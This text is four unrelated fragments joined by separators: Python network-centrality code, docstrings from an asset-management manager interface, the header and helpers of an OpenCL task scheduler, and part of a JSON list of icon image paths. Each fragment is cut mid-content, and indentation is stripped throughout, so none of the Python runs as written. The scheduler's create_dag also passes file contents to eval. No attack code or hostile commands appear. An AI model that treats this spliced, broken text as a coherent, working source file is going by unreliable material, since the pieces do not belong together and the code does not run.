betweenness_times_w = zn.copy()
# initialize node lists:
is_source = zn.copy()
if "sources" in kwargs and kwargs["sources"] is not None:
for i in kwargs["sources"]:
is_source[i] = 1
else:
for i in rN:
is_source[i] = 1
if "targets" in kwargs and kwargs["targets"] is not None:
targets = kwargs["targets"]
else:
targets = rN
# node offsets for flat arrays:
offsets = np.zeros(N)
for i in xrange(1, N):
offsets[i] = offsets[i-1] + k[i-1]
# Note: We don't use k.cumsum() since that uses to much memory!
# sort links by node indices (contains each link twice!):
links = nz_coords(self.sp_A)
# neighbours of each node:
flat_neighbors = np.array(links)[:, 1].astype(int)
E = len(flat_neighbors)
# this main loop might be parallelized:
for j0 in targets:
j = int(j0)
betweenness_to_j = w.copy().astype(float)
excess_to_j = w.copy().astype(float)
flat_predecessors = list(np.zeros(E, dtype=int))
# Note: this cannot be transferred as numpy array since if too
# large we get an glibc error...
_nsi_betweenness(N, E, w, k, j, betweenness_to_j,
excess_to_j, offsets.astype(int),
flat_neighbors,
is_source, np.array(flat_predecessors))
del flat_predecessors
betweenness_times_w += w[j] * (betweenness_to_j - excess_to_j)
return betweenness_times_w / w
def _eigenvector_centrality_slow(self, link_attribute=None):
"""
For each node, return its (weighted) eigenvector centrality.
This is the load on this node from the eigenvector corresponding to the
largest eigenvalue of the (weighted) adjacency matrix, normalized to a
maximum of 1.
:arg str link_attribute: Optional name of the link attribute to be used
as the links' weight. If None, links have weight 1. (Default: None)
:rtype: 1d numpy array [node] of floats
"""
if link_attribute == "topological":
print ("WARNING: link_attribute='topological' is deprecated.\n"
+ "Use link_attribute=None instead.")
link_attribute = None
if link_attribute is None:
if self.silence_level <= 1:
print "Calculating topological eigenvector centrality..."
return np.array(self.graph.eigenvector_centrality(weights=None))
else:
if self.silence_level <= 1:
print "Calculating weighted eigenvector centrality..."
return np.array(self.graph.eigenvector_centrality(
weights=link_attribute))
# faster version of the above:
@cached_const('base', 'ev centrality', 'eigenvector centrality')
def eigenvector_centrality(self):
"""
For each node, return its eigenvector centrality.
This is the load on this node from the eigenvector corresponding to the
largest eigenvalue of the adjacency matrix, normalized to a
maximum of 1.
**Example:**
>>> r(Network.SmallTestNetwork().eigenvector_centrality())
Calculating eigenvector centrality...
array([ 0.7895, 0.973 , 0.7769, 0.6941, 1. , 0.3109])
:rtype: 1d numpy array [node] of floats
"""
# TODO: allow for weights
_, evecs = eigsh(self.sp_A.astype(float), k=1, sigma=self.N**2,
maxiter=100, tol=1e-8)
ec = evecs.T[0]
ec *= np.sign(ec[0])
return ec / ec.max()
@cached_const('nsi', 'ev centrality', 'n.s.i. eigenvector centrality')
def nsi_eigenvector_centrality(self):
"""
For each node, return its n.s.i. eigenvector centrality.
This is the load on this node from the eigenvector corresponding to the
largest eigenvalue of the n.s.i. adjacency matrix, divided by
sqrt(node weight) and normalized to a maximum of 1.
**Example:**
>>> net = Network.SmallTestNetwork()
>>> r(net.nsi_eigenvector_centrality())
Calculating n.s.i. eigenvector centrality...
array([ 0.8045, 1. , 0.8093, 0.6179, 0.9867, 0.2804])
>>> r(net.splitted_copy().nsi_eigenvector_centrality())
Calculating n.s.i. eigenvector centrality...
array([ 0.8045, 1. , 0.8093, 0.6179, 0.9867, 0.2804, 0.2804])
as compared to the unweighted version:
>>> r(net.eigenvector_centrality())
Calculating eigenvector centrality...
array([ 0.7895, 0.973 , 0.7769, 0.6941, 1. , 0.3109])
>>> r(net.splitted_copy().eigenvector_centrality())
Calculating eigenvector centrality...
array([ 1. , 0.8008, 0.6226, 0.6625, 0.8916, 0.582 , 0.582 ])
:rtype: 1d numpy array [node] of floats
"""
DwR = self.sp_diag_sqrt_w()
sp_Astar = DwR * self.sp_Aplus() * DwR
| |
a
# 'shot' exists in a certain part of the asset system. One approach would be
# to use a 'getChildren' call, on this part of the system. This has the
# drawback that is assumes that shots are always something that can be
# described as 'immediate children' of the location in question. This lay not
# always be the case (say, for example there is some kind of 'task' structure
# in place too). Instead we use a request that asks for any 'shots' that
# relate to the chosen location. It is then up to the implementation of the
# ManagerInterface to determine how that maps to its own data model.
# Hopefully this allows Hosts of this API to work with a broader range of
# asset managements, without providing any requirements of their structure or
# data model.
#
# @{
@abc.abstractmethod
def getRelatedReferences(
self, entityRefs, relationshipSpecs, context, hostSession,
resultSpec=None):
"""
Returns related entity references, based on a relationship
specification.
This is an essential function in this API - as it is widely used
to query organisational hierarchy, etc...
There are three possible conventions for calling this function,
to allow for batch optimisations in the implementation and
prevent excessive query times with high-latency services.
- a) A single entity reference, a list of specifications.
- b) A list of entity references and a single specification.
- c) Equal length lists of references and specifications.
In all cases, the return value is a list of lists, for example:
a) getRelatedReferences([ r1 ], [ s1, s2, s3 ])
> [ [ r1s1... ], [ r1s2... ], [ r1s3... ] ]
b) getRelatedReferences([ r1, r2, r3 ], [ s1 ])
> [ [ r1s1... ], [ r2s1... ], [ r3s1... ] ]
c) getRelatedReferences([ r1, r2, r3 ], [ s1, s2, s3 ])
> [ [ r1s1... ], [ r2s2... ], [ r3s3... ] ]
@note The order of entities in the inner lists of matching
references will not be considered meaningful, but the outer list
should match the input order.
In summary, if only a single entityRef is provided, it should be
assumed that all specs should be considered for that one entity.
If only a single relationshipSpec is provided, then it should
be considered for all supplied entity references. If lists of
both are supplied, then they must be the same length, and it
should be assumed that it is a 1:1 mapping of spec per entity.
If this is not the case, ValueErrors should be thrown.
If any specification is unknown, then an empty list should be
returned for that specification, and no errors should be raised.
@param entityRefs List[str]
@param relationshipSpecs List[RelationshipSpecification]
@param context Context The calling context.
@param hostSession openassetio.managerAPI.HostSession The host
session that maps to the caller, this should be used for all
logging and provides access to the openassetio.managerAPI.Host
object representing the process that initiated the API session.
@param resultSpec openassetio.specifications.EntitySpecification
or None, a hint as to what kind of entity the caller is
expecting to be returned. May be None.
@return List[List[str]] This MUST be the correct length,
returning an empty outer list is NOT valid. (ie: max(len(refs),
len(specs)))
@exception ValueError If more than one reference and
specification is provided, but they lists are not equal in
length, ie: not a 1:1 mapping of entities to specs. The
abstraction of this interface into the Manager class does
cursory validation that this is the case before calling this
function.
@see @ref openassetio.specifications "specifications"
@see @ref setRelatedReferences
"""
raise NotImplementedError
def setRelatedReferences(
self, entityRef, relationshipSpec, relatedRefs,
context, hostSession, append=True):
"""
Creates a new relationship between the referenced entities.
Though getRelatedReferences is an essential call, there is some
asymmetry here, as it is not necessarily required to be able to
setRelatedReferences directly. For example, in the case of a
'shot' (as illustrated in the docs for getRelatedReferences) -
any new shots would be created by registering a new
ShotSpecification under the parent, rather than using this call.
The best way to think of it is that this call is reserved for
defining relationships between existing assets (such as
connecting the script used to define a render, with the image
sequences it creates) and 'register' as being defining the
relationship between a new asset and some existing one.
In systems that don't support post-creation adjustment of
relationships, this can simply be a no-op.
@param entityRef `str` The entity to which the relationship
should be established.
@param relationshipSpec openassetio.specifications.RelationshipSpecification,
The type of relationship to establish.
@param relatedRefs List[str], The related entities for the
given relationship.
@param context Context The calling context.
@param hostSession openassetio.managerAPI.HostSession The host
session that maps to the caller, this should be used for all
logging and provides access to the openassetio.managerAPI.Host
object representing the process that initiated the API session.
@param append bool, When True (default) new relationships will
be added to any existing ones. If False, then any existing
relationships with the supplied specification will first be
removed.
@return None
@see @ref getRelatedReferences
@see @ref register
"""
if not self.entityExists(entityRef, context, hostSession):
raise exceptions.InvalidEntityReference(entityReference=entityRef)
for ref in relatedRefs:
if not self.entityExists(ref, context, hostSession):
raise exceptions.InvalidEntityReference(entityReference=ref)
## @}
##
# @name Publishing
#
# The publishing functions allow a host create entities within the
# @ref asset_management_system represented by this implementation. The API
# is designed to accommodate the broad variety of roles that
# different asset managers embody. Some are 'librarians' that simply
# catalog the locations of existing media. Others take an active role
# in both the temporary and long-term paths to items they manage.
#
# There are two key components to publishing within this API.
#
# **1 - The Entity Reference**
#
# As with the other entry points in this API, it is assumed that an @ref
# entity_reference is known ahead of time. How this reference is determined
# is beyond the scope of this layer of the API, and functions exists in
# higher levels that combine browsing and publishing etc... Here, we simply
# assert that there must be a meaningful reference given the @ref
# Specification of the entity that is being created or published.
#
# @note 'Meaningful' is best defined by the asset manager itself. For
# example, in a system that versions each 'asset' by creating children of the
# asset for each version, when talking about where to publish an image
# sequence of a render to, it may make sense to reference to the Asset
# itself, so that the system can determine the 'next' version number at the
# time of publish. It may also make sense to reference a specific version of
# this asset to implicitly state which version it will be written to. Other
# entity types may not have this flexibility.
#
# **2 - The Specification**
#
# The Specification allows ancillary information to be provided to help the
# implementation better interpret what type of entity may be best suited in
# any given situation. For example, a path to an image will generally be
# accompanied by with an spec, that details the file type, color space,
# resolution etc...
#
# @note The Specification should *not* be confused with @ref attributes. The
# implementation must not directly store any information contained within the
# Specification, though it may be used to better define the type of entity.
# Hosts that wish to persist other properties of the published entity, will
# call @ref setEntityAttributes() directly instead, and as described in the
# attributes section, it is assumed that this is the channel for information
# that needs to persist.
#
# For more on the relationship | |
<gh_stars>0
import pyopencl as cl
import pyopencl.tools
import pyopencl.array
import datetime
import collections
import os
from copy import deepcopy
import threading
# import mutex
import logging
import numpy as np
import constant_pyschedcl as cons
import time
import gc
import resource
from decimal import *
import threading
import time
from collections import defaultdict
try:
import Queue as Q
except ImportError:
import queue as Q
numpy_types = {
"unsigned": np.uint32,
"unsigned int": np.uint32,
"uint": np.uint32,
"int": np.int32,
"long": np.int64,
"long int": np.int64,
"float": np.float32,
"double": np.float64,
"char": np.int8,
"short": np.int16,
"uchar": np.uint8,
"unsigned char": np.uint8,
"ulong": np.uint64,
"unsigned long": np.uint64,
"ushort": np.uint16,
"unsigned short": np.uint16
}
VEC_TYPES = ['char16', 'char2', 'char3', 'char4', 'char8', 'double16', 'double2', 'double3', 'double4', 'double8',
'float16', 'float2', 'float3', 'float4', 'float8', 'int16', 'int2', 'int3', 'int4', 'int8', 'long16',
'long2', 'long3', 'long4', 'long8', 'short16', 'short2', 'short3', 'short4', 'short8', 'uchar16', 'uchar2',
'uchar3', 'uchar4', 'uchar8', 'uint16', 'uint2', 'uint3', 'uint4', 'uint8', 'ulong16', 'ulong2', 'ulong3',
'ulong4', 'ulong8', 'ushort16', 'ushort2', 'ushort3', 'ushort4', 'ushort8', ]
SOURCE_DIR = os.getcwd()+"/"
MAX_GPU_ALLOC_SIZE = 0
MAX_CPU_ALLOC_SIZE = 0
# finished_kernels = list()
# q = Q.PriorityQueue()
for datatype in VEC_TYPES:
numpy_types[datatype] = eval('cl.array.vec.{}'.format(datatype))
system_cpus, system_gpus = 0, 0
nGPU, nCPU = 0, 0
est_cpu = 0.0
est_gpu = 0.0
device_history = {"gpu": [], "cpu": []}
ready_queue = {"gpu": collections.deque(), "cpu": collections.deque()}
# cs = mutex.mutex()
user_defined = dict()
dump_output = False
just_for_testing_num_chunks = 1
global_programs = defaultdict(dict)
# bolt = [0]
# rqlock = [0]
boltLock = threading.Lock()
rqLock = threading.Condition()
callback_queue = {}
###################TODO###############################
finishe_ker = list()
ex_callback_queue = {}
ex_callback_queue["READ"] = {}
ex_callback_queue["WRITE"] = {}
ex_callback_queue["KERNEL"] = {}
kernel_hist = {}
TASK = 0
ken = 0
enque_read = 0
enque_write = 0
duplicate_read = 0
duplicate_write = 0
kernel__data = {}
kernel__data1 = {}
kernel_dataset = {}
kernel_chunkleft = {}
kernel_buffer = {}
spantime = 0
release_host = list()
release_device = list()
count = 0
time1 = list()
construction_time = 0
kernel__name = {}
task_dag_object = None
done_events = []
frontier_Q = []
frontier_Q_lock = threading.Condition()
def convert_to_milliseconds(exec_time):
return 1000*exec_time
def adjust_zero(timestamps):
kernels = timestamps.keys()
reference_device = {}
reference_host = {}
total_time = 0
for kernel in kernels:
device = timestamps[kernel]["device"]
t = timestamps[kernel]["write"]["device_queued"]
if t == -1:
continue
if not (device in reference_device):
reference_device[device] = t
else:
reference_device[device] = min(reference_device[device],t)
t = timestamps[kernel]["write"]["host_queued"]
logging.info("Host Queued time: " + str(t))
if not (device in reference_host):
reference_host[device] = t
else:
reference_host[device] = min(reference_host[device],t)
relative_timestamps = deepcopy(timestamps)
global_reference = None
for key,value in reference_host.items():
if not global_reference:
global_reference = value
else:
global_reference = min(value,global_reference)
for kernel,kernel_timestamps in relative_timestamps.items():
device = kernel_timestamps["device"]
for event_type,event_timestamps in kernel_timestamps.items():
#print(event_type)
if event_type == "device":
continue
else:
#continue
for sub_event_type in event_timestamps:
if sub_event_type[:4] == "host":
event_timestamps[sub_event_type] -= global_reference
else:
event_timestamps[sub_event_type] = event_timestamps[sub_event_type] - reference_device[device] + reference_host[device] - global_reference
total_time = max(total_time,event_timestamps[sub_event_type])
#print "Total Time Taken - ",total_time
#print(json.dumps(relative_timestamps,sort_keys=True,indent=1))
return relative_timestamps, total_time
def replace(dictionary, a, b):
#print "replacing"
a = str(a)
b = str(b)
#print type(dictionary)
if type(dictionary) == list:
for item in dictionary:
replace(item,a,b)
elif type(dictionary) == dict:
for key in dictionary:
#print dictionary[key],type(dictionary[key])
if type(dictionary[key]) == dict:
replace(dictionary[key],a,b)
elif type(dictionary[key]) in [str]: #,unicode]:
#print "before replacement : ",dictionary[key]
dictionary[key] = dictionary[key].replace(a,b)
#print "after replacement : ",dictionary[key]
elif type(dictionary[key]) == list:
for item in dictionary[key]:
replace(item,a,b)
def create_dag(info_folder,dag_file,output_file,partition=-1):
from os import listdir
from os.path import join
import json
dag_info = open(dag_file,'r').readlines()
counter = 0
task_map = {}
task_symvar_map = {}
while dag_info[counter]!='---\n':
line = dag_info[counter].strip("\n")
key,value,symvar = line.split(" ")
task_map[int(key)] = value
task_symvar_map[int(key)]=eval(symvar)
counter +=1
counter +=1
adj_list = defaultdict(list)
buffer_edge_info = []
while dag_info[counter]!='---\n':
line = dag_info[counter].strip("\n")
u,v = line.split("->")
s,b_s = map(int,u.split(" "))
d,b_d = map(int,v.split(" "))
adj_list[d].append((s,b_s,b_d))
buffer_edge_info.append(line)
counter +=1
json_files = [join(info_folder,f) for f in listdir(info_folder)]
json_dictionary = {}
dag_json = []
print(adj_list)
for f in listdir(info_folder):
if f.endswith('.json') and (f in task_map.values()):
filename = join(info_folder,f)
with open(filename,'r') as g:
json_dictionary[f]=json.loads(g.read())
for t in task_map:
json_file = deepcopy(json_dictionary[task_map[t]])
json_file["id"]=t
json_file["symbolicVariables"]=task_symvar_map[t]
#print json_file
for sym,val in json_file["symbolicVariables"].items():
replace(json_file,sym,val)
json_file["depends"]=set()
json_file["partition"] = json_file["symbolicVariables"]["partition"]
if "localWorkSize" in json_file["symbolicVariables"]:
json_file["localWorkSize"] = [json_file["symbolicVariables"]["localWorkSize"] for _ in range(json_file["workDimension"])]
if partition!=-1:
if int(json_file["partition"]) == 10:
json_file["task"] = 0
else:
json_file["task"] = 1
# print "Task ",t
# print adj_list[t]
for v in adj_list[t]:
u,s_b,d_b = v
json_file["depends"].add(u)
from_value = {"kernel":u,"pos":s_b}
for buffer_type in ["inputBuffers","ioBuffers"]:
for buffer_info in json_file[buffer_type]:
if buffer_info["pos"]==d_b:
buffer_info["from"]=from_value
json_file["depends"] = list(json_file["depends"])
dag_json.append(json_file)
with open(output_file,'w') as g:
json.dump(dag_json,g,indent=2)
def blank_fn(*args, **kwargs):
"""
Does nothing. Used as dummy function for callback events.
"""
pass
class HostEvents(object):
"""
Class for storing timing information of various events associated with a kernel.
:ivar dispatch_start: Start Timestamp for dispatch function
:ivar dispatch_end: End Timestamp for dispatch function
:ivar create_buf_start: Start Timestamp for Creation of Buffers
:ivar create_buf_end: End Timestamp for Creation of Buggers
:ivar write_start: Start TimeStamp for Enqueuing Write Buffer Commands on Command Queue
:ivar write_end: End Timestamp for Writing of Buffers to Device
:ivar ndrange_start: Start TimeStamp for Launching Kernel
:ivar ndrange_end: End Timestamp for when kernel execution is finished on device
:ivar read_start: Start TimeStamp for Enqueuing Read Buffer Commands on Command Queue
:ivar read_end: End TimeStamp for Reading of Buffers from Device to Host
:ivar kernel_name: Name of kernel
:ivar kernel_id: Unique id for kernel
:ivar dispatch_id: Dispatch id for kernel
"""
def __init__(self, kernel_name='', kernel_id='', dispatch_id='', dispatch_start=None, dispatch_end=None,
create_buf_start=None, create_buf_end=None, write_start=None, write_end=None, ndrange_start=None,
ndrange_end=None, read_start=None, read_end=None):
"""
Initialise attributes of HostEvents class .
"""
self.dispatch_start = dispatch_start
self.dispatch_end = dispatch_end
self.create_buf_start = create_buf_start
self.create_buf_end = create_buf_end
self.write_start = write_start
self.write_end = write_end
self.ndrange_start = ndrange_start
self.ndrange_end = ndrange_end
self.read_start = read_start
self.read_end = read_end
self.kernel_name = kernel_name
self.kernel_id = kernel_id
self.dispatch_id = dispatch_id
def __str__(self):
a = deepcopy(self.__dict__)
for i in a:
a[i] = str(a[i])
return str(a)
def __repr__(self):
return str(self)
def is_not_empty(self):
empty = self.dispatch_start is None and self.dispatch_end is None and self.create_buf_start is None and self.create_buf_end is None and self.write_start is None and self.write_end is None and self.ndrange_start is None and self.ndrange_end is None and self.read_start is None and self.read_end is None
return not empty
def dump_device_history():
"""
Dumps device history to debug.log file.
"""
debug_strs = []
min_timestamp = Decimal('Infinity')
max_timestamp = 0.0
finishing_timestamps ={'cpu':0.0, 'gpu': 0.0}
for dev in ['gpu', 'cpu']:
for device_id in range(len(device_history[dev])):
for host_event in device_history[dev][device_id]:
if host_event.is_not_empty():
kernel_id = host_event.kernel_id
kernel_name = host_event.kernel_name
write_start = "%.20f" % host_event.write_start
min_timestamp = min(min_timestamp, Decimal(write_start))
write_end = "%.20f" % host_event.write_end
ndrange_start = "%.20f" % host_event.ndrange_start
ndrange_end = "%.20f" % host_event.ndrange_end
read_start = "%.20f" % host_event.read_start
read_end = "%.20f" % host_event.read_end
max_timestamp = max(max_timestamp, Decimal(read_end))
debug_str = "HOST_EVENT " + dev + " " + str(device_id) + " " + str(
kernel_id) + "," + kernel_name + " " + write_start + " " + write_end + " " + \
ndrange_start + " " + ndrange_end + " " + read_start + " " + read_end
logging.debug(debug_str)
# print debug_str
debug_strs.append(debug_str)
finishing_timestamps[dev]=round(float(Decimal(read_end)-Decimal(write_start)),4)
profile_time = max_timestamp - min_timestamp
print("span_time " + str(profile_time))
print(finishing_timestamps)
# return debug_strs
return finishing_timestamps
def partition_round(elms, percent, exact=-1, total=100, *args, **kwargs):
"""
Partitions dataset in a predictable way.
:param elms: Total Number of elements
:type elms: Integer
:param percent: Percentage of problem space to be processed on one device
:param type: Integer
:param exact: Flag that states whether percentage of problem space is greater than 50 or not (0 for percent < 50, 1 for percent >= 50)
:param type: Integer
:param total: Percentage of total problem space (Default value: 100)
:type total: Integer
:return: Number of elements of partitioned dataset
:rtype: Integer
"""
if elms < 100:
factor = 10
x = elms / 10.0
else:
factor = 1
x = elms / 100.0
if exact == -1:
exact = 0 if percent > 50 else 1
if elms % 2 == 0:
if percent == 50:
logging.debug(
"PARTITION: get_slice_values -> multiple_round -> partition_round (if percent=50) returns: %d",
elms / 2)
return int(elms / 2)
elif exact == 0:
b = int(x * (total - percent) / factor)
return partition_round(elms, total) - b if total != 100 else elms - b
elif exact == 1:
logging.debug("PARTITION: get_slice_values -> multiple_round -> partition_round (if exact=1) returns: %d",
x * percent / factor)
return int(x * percent / factor)
else:
if percent > 50:
return partition_round(elms - 1, percent, exact, total)
else:
return partition_round(elms - 1, percent, exact, total) + 1
part_round | |
"name": "megaphone--minus"
},
{
"url": "/images/status/megaphone--pencil.png",
"name": "megaphone--pencil"
},
{
"url": "/images/status/megaphone--plus.png",
"name": "megaphone--plus"
},
{
"url": "/images/status/megaphone.png",
"name": "megaphone"
},
{
"url": "/images/status/memory.png",
"name": "memory"
},
{
"url": "/images/status/metronome--arrow.png",
"name": "metronome--arrow"
},
{
"url": "/images/status/metronome--exclamation.png",
"name": "metronome--exclamation"
},
{
"url": "/images/status/metronome--minus.png",
"name": "metronome--minus"
},
{
"url": "/images/status/metronome--pencil.png",
"name": "metronome--pencil"
},
{
"url": "/images/status/metronome--plus.png",
"name": "metronome--plus"
},
{
"url": "/images/status/metronome.png",
"name": "metronome"
},
{
"url": "/images/status/microformats.png",
"name": "microformats"
},
{
"url": "/images/status/microphone--arrow.png",
"name": "microphone--arrow"
},
{
"url": "/images/status/microphone--exclamation.png",
"name": "microphone--exclamation"
},
{
"url": "/images/status/microphone--minus.png",
"name": "microphone--minus"
},
{
"url": "/images/status/microphone--pencil.png",
"name": "microphone--pencil"
},
{
"url": "/images/status/microphone--plus.png",
"name": "microphone--plus"
},
{
"url": "/images/status/microphone.png",
"name": "microphone"
},
{
"url": "/images/status/minus-button.png",
"name": "minus-button"
},
{
"url": "/images/status/minus-circle-frame.png",
"name": "minus-circle-frame"
},
{
"url": "/images/status/minus-circle.png",
"name": "minus-circle"
},
{
"url": "/images/status/minus-octagon-frame.png",
"name": "minus-octagon-frame"
},
{
"url": "/images/status/minus-octagon.png",
"name": "minus-octagon"
},
{
"url": "/images/status/minus-shield.png",
"name": "minus-shield"
},
{
"url": "/images/status/minus-small-circle.png",
"name": "minus-small-circle"
},
{
"url": "/images/status/minus-small-white.png",
"name": "minus-small-white"
},
{
"url": "/images/status/minus-small.png",
"name": "minus-small"
},
{
"url": "/images/status/minus-white.png",
"name": "minus-white"
},
{
"url": "/images/status/minus.png",
"name": "minus"
},
{
"url": "/images/status/mobile-phone--arrow.png",
"name": "mobile-phone--arrow"
},
{
"url": "/images/status/mobile-phone--exclamation.png",
"name": "mobile-phone--exclamation"
},
{
"url": "/images/status/mobile-phone--minus.png",
"name": "mobile-phone--minus"
},
{
"url": "/images/status/mobile-phone--pencil.png",
"name": "mobile-phone--pencil"
},
{
"url": "/images/status/mobile-phone--plus.png",
"name": "mobile-phone--plus"
},
{
"url": "/images/status/mobile-phone-cast.png",
"name": "mobile-phone-cast"
},
{
"url": "/images/status/mobile-phone-off.png",
"name": "mobile-phone-off"
},
{
"url": "/images/status/mobile-phone.png",
"name": "mobile-phone"
},
{
"url": "/images/status/money--arrow.png",
"name": "money--arrow"
},
{
"url": "/images/status/money--exclamation.png",
"name": "money--exclamation"
},
{
"url": "/images/status/money--minus.png",
"name": "money--minus"
},
{
"url": "/images/status/money--pencil.png",
"name": "money--pencil"
},
{
"url": "/images/status/money--plus.png",
"name": "money--plus"
},
{
"url": "/images/status/money-coin.png",
"name": "money-coin"
},
{
"url": "/images/status/money.png",
"name": "money"
},
{
"url": "/images/status/monitor--arrow.png",
"name": "monitor--arrow"
},
{
"url": "/images/status/monitor--exclamation.png",
"name": "monitor--exclamation"
},
{
"url": "/images/status/monitor--minus.png",
"name": "monitor--minus"
},
{
"url": "/images/status/monitor--pencil.png",
"name": "monitor--pencil"
},
{
"url": "/images/status/monitor--plus.png",
"name": "monitor--plus"
},
{
"url": "/images/status/monitor-cast.png",
"name": "monitor-cast"
},
{
"url": "/images/status/monitor-image.png",
"name": "monitor-image"
},
{
"url": "/images/status/monitor-network.png",
"name": "monitor-network"
},
{
"url": "/images/status/monitor-off.png",
"name": "monitor-off"
},
{
"url": "/images/status/monitor-screensaver.png",
"name": "monitor-screensaver"
},
{
"url": "/images/status/monitor-sidebar.png",
"name": "monitor-sidebar"
},
{
"url": "/images/status/monitor-wallpaper.png",
"name": "monitor-wallpaper"
},
{
"url": "/images/status/monitor-window-3d.png",
"name": "monitor-window-3d"
},
{
"url": "/images/status/monitor-window-flow.png",
"name": "monitor-window-flow"
},
{
"url": "/images/status/monitor-window.png",
"name": "monitor-window"
},
{
"url": "/images/status/monitor.png",
"name": "monitor"
},
{
"url": "/images/status/mouse--arrow.png",
"name": "mouse--arrow"
},
{
"url": "/images/status/mouse--exclamation.png",
"name": "mouse--exclamation"
},
{
"url": "/images/status/mouse--minus.png",
"name": "mouse--minus"
},
{
"url": "/images/status/mouse--pencil.png",
"name": "mouse--pencil"
},
{
"url": "/images/status/mouse--plus.png",
"name": "mouse--plus"
},
{
"url": "/images/status/mouse-select-right.png",
"name": "mouse-select-right"
},
{
"url": "/images/status/mouse-select-wheel.png",
"name": "mouse-select-wheel"
},
{
"url": "/images/status/mouse-select.png",
"name": "mouse-select"
},
{
"url": "/images/status/mouse.png",
"name": "mouse"
},
{
"url": "/images/status/music--arrow.png",
"name": "music--arrow"
},
{
"url": "/images/status/music--exclamation.png",
"name": "music--exclamation"
},
{
"url": "/images/status/music--minus.png",
"name": "music--minus"
},
{
"url": "/images/status/music--pencil.png",
"name": "music--pencil"
},
{
"url": "/images/status/music--plus.png",
"name": "music--plus"
},
{
"url": "/images/status/music-beam-16.png",
"name": "music-beam-16"
},
{
"url": "/images/status/music-beam.png",
"name": "music-beam"
},
{
"url": "/images/status/music-small.png",
"name": "music-small"
},
{
"url": "/images/status/music.png",
"name": "music"
},
{
"url": "/images/status/na.png",
"name": "na"
},
{
"url": "/images/status/navigation-000-button.png",
"name": "navigation-000-button"
},
{
"url": "/images/status/navigation-000-frame.png",
"name": "navigation-000-frame"
},
{
"url": "/images/status/navigation-000-white.png",
"name": "navigation-000-white"
},
{
"url": "/images/status/navigation-090-button.png",
"name": "navigation-090-button"
},
{
"url": "/images/status/navigation-090-frame.png",
"name": "navigation-090-frame"
},
{
"url": "/images/status/navigation-090-white.png",
"name": "navigation-090-white"
},
{
"url": "/images/status/navigation-090.png",
"name": "navigation-090"
},
{
"url": "/images/status/navigation-180-button.png",
"name": "navigation-180-button"
},
{
"url": "/images/status/navigation-180-frame.png",
"name": "navigation-180-frame"
},
{
"url": "/images/status/navigation-180-white.png",
"name": "navigation-180-white"
},
{
"url": "/images/status/navigation-180.png",
"name": "navigation-180"
},
{
"url": "/images/status/navigation-270-button.png",
"name": "navigation-270-button"
},
{
"url": "/images/status/navigation-270-frame.png",
"name": "navigation-270-frame"
},
{
"url": "/images/status/navigation-270-white.png",
"name": "navigation-270-white"
},
{
"url": "/images/status/navigation-270.png",
"name": "navigation-270"
},
{
"url": "/images/status/navigation.png",
"name": "navigation"
},
{
"url": "/images/status/network-cloud.png",
"name": "network-cloud"
},
{
"url": "/images/status/network-clouds.png",
"name": "network-clouds"
},
{
"url": "/images/status/network-ethernet.png",
"name": "network-ethernet"
},
{
"url": "/images/status/network-hub.png",
"name": "network-hub"
},
{
"url": "/images/status/network.png",
"name": "network"
},
{
"url": "/images/status/new.png",
"name": "new"
},
{
"url": "/images/status/newspaper--arrow.png",
"name": "newspaper--arrow"
},
{
"url": "/images/status/newspaper--exclamation.png",
"name": "newspaper--exclamation"
},
{
"url": "/images/status/newspaper--minus.png",
"name": "newspaper--minus"
},
{
"url": "/images/status/newspaper--pencil.png",
"name": "newspaper--pencil"
},
{
"url": "/images/status/newspaper--plus.png",
"name": "newspaper--plus"
},
{
"url": "/images/status/newspaper.png",
"name": "newspaper"
},
{
"url": "/images/status/newspapers.png",
"name": "newspapers"
},
{
"url": "/images/status/node-delete-child.png",
"name": "node-delete-child"
},
{
"url": "/images/status/node-delete-next.png",
"name": "node-delete-next"
},
{
"url": "/images/status/node-delete-previous.png",
"name": "node-delete-previous"
},
{
"url": "/images/status/node-delete.png",
"name": "node-delete"
},
{
"url": "/images/status/node-design.png",
"name": "node-design"
},
{
"url": "/images/status/node-insert-child.png",
"name": "node-insert-child"
},
{
"url": "/images/status/node-insert-next.png",
"name": "node-insert-next"
},
{
"url": "/images/status/node-insert-previous.png",
"name": "node-insert-previous"
},
{
"url": "/images/status/node-insert.png",
"name": "node-insert"
},
{
"url": "/images/status/node-magnifier.png",
"name": "node-magnifier"
},
{
"url": "/images/status/node-select-all.png",
"name": "node-select-all"
},
{
"url": "/images/status/node-select-child.png",
"name": "node-select-child"
},
{
"url": "/images/status/node-select-next.png",
"name": "node-select-next"
},
{
"url": "/images/status/node-select-previous.png",
"name": "node-select-previous"
},
{
"url": "/images/status/node-select.png",
"name": "node-select"
},
{
"url": "/images/status/node.png",
"name": "node"
},
{
"url": "/images/status/notebook--arrow.png",
"name": "notebook--arrow"
},
{
"url": "/images/status/notebook--exclamation.png",
"name": "notebook--exclamation"
},
{
"url": "/images/status/notebook--minus.png",
"name": "notebook--minus"
},
{
"url": "/images/status/notebook--pencil.png",
"name": "notebook--pencil"
},
{
"url": "/images/status/notebook--plus.png",
"name": "notebook--plus"
},
{
"url": "/images/status/notebook.png",
"name": "notebook"
},
{
"url": "/images/status/notebooks.png",
"name": "notebooks"
},
{
"url": "/images/status/open-share-balloon.png",
"name": "open-share-balloon"
},
{
"url": "/images/status/open-share-document.png",
"name": "open-share-document"
},
{
"url": "/images/status/open-share-small.png",
"name": "open-share-small"
},
{
"url": "/images/status/open-share.png",
"name": "open-share"
},
{
"url": "/images/status/open-source.png",
"name": "open-source"
},
{
"url": "/images/status/openid.png",
"name": "openid"
},
{
"url": "/images/status/opml-balloon.png",
"name": "opml-balloon"
},
{
"url": "/images/status/opml-document.png",
"name": "opml-document"
},
{
"url": "/images/status/opml-small.png",
"name": "opml-small"
},
{
"url": "/images/status/opml.png",
"name": "opml"
},
{
"url": "/images/status/paint-brush--arrow.png",
"name": "paint-brush--arrow"
},
{
"url": "/images/status/paint-brush--exclamation.png",
"name": "paint-brush--exclamation"
},
{
"url": "/images/status/paint-brush--minus.png",
"name": "paint-brush--minus"
},
{
"url": "/images/status/paint-brush--pencil.png",
"name": "paint-brush--pencil"
},
{
"url": "/images/status/paint-brush--plus.png",
"name": "paint-brush--plus"
},
{
"url": "/images/status/paint-brush-color.png",
"name": "paint-brush-color"
},
{
"url": "/images/status/paint-brush-small.png",
"name": "paint-brush-small"
},
{
"url": "/images/status/paint-brush.png",
"name": "paint-brush"
},
{
"url": "/images/status/paint-can--arrow.png",
"name": "paint-can--arrow"
},
{
"url": "/images/status/paint-can--exclamation.png",
"name": "paint-can--exclamation"
},
{
"url": "/images/status/paint-can--minus.png",
"name": "paint-can--minus"
},
